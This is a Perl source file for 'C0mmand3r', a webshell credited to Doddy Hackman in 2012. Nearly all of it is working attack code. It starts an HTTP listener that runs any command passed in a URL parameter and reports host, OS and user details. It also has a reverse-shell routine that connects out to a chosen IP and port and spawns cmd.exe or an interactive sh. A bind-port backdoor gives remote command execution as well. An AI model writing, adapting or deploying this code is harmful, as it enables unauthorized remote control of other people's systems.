#!usr/bin/perl##C0mmand3r (C) Doddy HAckman 2012#Version 0.3##A simple WebShell in Perl##use IO::Socket;use CGI;use Cwd;use Win32;my $port = rep();sub rep { unless ( $ARGV[0] ) { return int("777"); #Your Can Edit 666 } else { return int( $ARGV[0] ); }}print "\n\n#########################################\n\n";print "C0mmand3r (C) Doddy HAckman 2012\n\n\n";print "[+] Starting the webshell on port $port\n\n";print "#########################################\n\n";my $sock = new IO::Socket::INET( LocalHost => 'localhost', LocalPort => $port, Proto => 'tcp', Listen => SOMAXCONN, Reuse => 1);while ( $jebus = $sock->accept() ) { print $jebus "HTTP/1.1 200/OK\r\nContent-type:text/html\r\n\r\n";#print $jebus "HTTP/1.1 200/OK\r\nContent-type:application/w-www-form-urlencoded\r\n\r\n"; next if $slave = fork; close $sock; while ( $response = <$jebus> ) { chomp($response); my %rta; if ( $response =~ /GET/ig ) { capturar($response); } sub capturar { my $aa = shift; chomp $aa; if ( $aa =~ /GET \/(.*) HTTP\/1.1/ig ) { my $todo = $1; if ( $todo =~ /\?(.*)=(.*)&(.*)=(.*)/ig ) { $rta{$1} = $2; $rta{$3} = $4; } if ( $todo =~ /\?(.*)=(.*)/ig ) { $rta{$1} = $2; } } } print $jebus "<style type=text/css>.main {margin : -287px 0px 0px -490px;border : White solid 1px;BORDER-COLOR: #00FF00;}#pie {position: absolute;bottom: 0;}body,a:link {font: normal 16px Verdana, Arial, Helvetica,sans-serif;background-color: #000000;color:#00FF00;Courier New;cursor:crosshair;font-size: small;}input,table.outset,table.bord,table,textarea,select,fieldset {background-color:black;color:#00FF00; border: solid 1px #00FF00;border-color:#00FF00}a:link,a:visited,a:active {color: #00FF00;font: normal 16px Verdana, Arial, Helvetica,sans-serif;text-decoration: none;}</style>"; if ( $rta{'info'} ) { info(); print $jebus "<center><br><br><b>IP : </b>" . get_ip() . "<br>"; print $jebus "<center><br><br><b>Domain : </b>" . Win32::DomainName() . "<br>"; print $jebus "<b>Chip : </b>" . Win32::GetChipName() . "<br>"; print $jebus "<b>OS : </b>" . Win32::GetOSName() . "<br>"; print $jebus "<b>Version : </b>" . Win32::GetOSVersion() . "<br>"; print $jebus "<b>User : </b>" . Win32::LoginName() . "<br><br></center>"; copyright(); } elsif ( $rta{'console'} ) { logouno(); print $jebus "<br><br><center><form action='' method=GET>Command : <input type=text name=cmd value=ver><input type=submit value=Execute></center></form><br><br>"; copyright(); } elsif ( $rta{'cmd'} ) { logouno(); $lucha = $rta{'cmd'}; print $jebus "<br><br><center><fieldset>"; $lucha =~ s/\+/ /; print $jebus "<br>[+] Command : <b>$lucha</b><br><br>"; print $jebus qx($lucha); print $jebus "</center></fieldset>"; copyright(); } elsif ( $rta{'reverse'} ) { logodos(); print $jebus qq(<center><br><br><b>ReverseShell</b><br><br><form action='' method=GET><b>Your IP</B> : <input type=text name=ipconnect value=localhost><br><b>Port</b> : <input type=text name=port value=666><br><br><input type=submit value=Connect></form><br><br></center>); copyright(); } elsif ( $rta{'ipconnect'} ) { conectar( $rta{'ipconnect'}, $rta{'port'} ); tipo(); sub conectar { socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") ); connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) ); open( STDIN, ">&REVERSE" ); open( STDOUT, ">&REVERSE" ); open( STDERR, ">&REVERSE" ); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ( $^O =~ /Win32/ig ) { infowin(); system("cmd.exe"); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : " . Win32::DomainName() . "\n"; print "[+] OS Version : " . Win32::GetOSName() . "\n"; print "[+] Username : " . Win32::LoginName() . "\n\n\n"; } sub infolinux { print "[+] System information\n\n"; system("uname -a"); print "\n\n"; } } elsif ( $rta{'backdoor'} ) { logotres(); print $jebus qq(<center><br><br><b>BindPort</b><br><br><form action='' method=GET><b>Port</b> : <input type=text name=portbind value=666><br><br><input type=submit value=Bind></form><br><br></center>); copyright(); } elsif ( $rta{'portbind'} ) { $backdoor = IO::Socket::INET->new( Proto => 'tcp', LocalPort => $rta{'portbind'}, Listen => SOMAXC, Reuse => 1 ); while ( $jesus = $backdoor->accept() ) { $jesus->autoflush(1); print $jesus "[*] Heaven_Door Online\n[*] Port : 25256\n[*] PID : " . $$ . "\n\n"; print $jesus "Welcome " . $jesus->peerhost . "\n\n"; &extras; $dir = getcwd(); print $jesus $dir . ">>"; while (<$jesus>) { my $yeah = qx($_); print $jesus "\n\n" . $yeah . "\n\n"; print $jesus $dir . ">>"; } } sub extras { if ( $^O =~ //ig ) { print $jesus "[+] Domain Name : " . Win32::DomainName() . "\n"; print $jesus "[+] OS Version : " . Win32::GetOSName() . "\n"; print $jesus "[+] Username : " . Win32::LoginName() . "\n\n\n"; } else { $s = qx("uname -a"); print $jesus "--==System Info==--\n\n" . $s; } } } elsif ( $rta{'about'} ) { about(); print $jebus qq(<pre><center> ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾¾ ¾ ¾ ¾ ¾¾¾¾ ¾ ¾ ¾ ¾¾ ¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ ¾¾¾¾ </pre></center>); copyright(); } else { print $jebus "<title>Commander 0.3 (C) Doddy Hackman 2012</title><br><br><h1><center>Commander</center></h1><br><br><center><table border=1><td class=main><center><b>Tools</b></center></td><tr><td class=main><a href=?info=true><center>Information</center></a></td><tr><td class=main><a href=?console=true><center>Console</center></a></td><tr><td class=main><a href=?backdoor=true><center>Backdoor</center></a></td><tr><td class=main><a href=?reverse=true><center>ReverseShell</center></a></td><tr><td class=main><a href=?about=true><center>About</center></a></td></table></center>"; copyright(); } $jebus->close; }}continue { $jebus->close;}sub logouno { print $jebus qq(<pre><center> @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@@@ @@@@ @@@@@@ @@ @@@@@@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@ @@ @@ @@@@ @@@@@@ @@ @@@@@@ </pre></center>);}sub logodos { print $jebus qq(<pre><center> @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@ @@@@@@ @@@@ @@@@ @@@@@@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@ @@@@@@ @@ @@@@ @@@@@@ </pre></center>);}sub logotres { print $jebus qq(<pre><center> @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@@@ @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ @@@@@@ @@ </pre></center>);}sub about { print $jebus qq(<pre><center> @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@@@@@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@@@@@@@ @@@@@@ @@@@ @@ @@</pre></center>);}sub info { print $jebus qq(<pre><center> @@ @@ @@ @@@@@@@@@@ @@@@@@@@ @@ @@@@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@ </pre></center>);}sub get_ip { my $get = gethostbyname(""); return inet_ntoa($get);}sub copyright { print $jebus "<br><br><br><br><center><h1>Coded By Doddy H</h2></center><br><br>"; exit(1);}# The End ?
Anarquía es la noción radical de que las demás personas no son de tu propiedad.
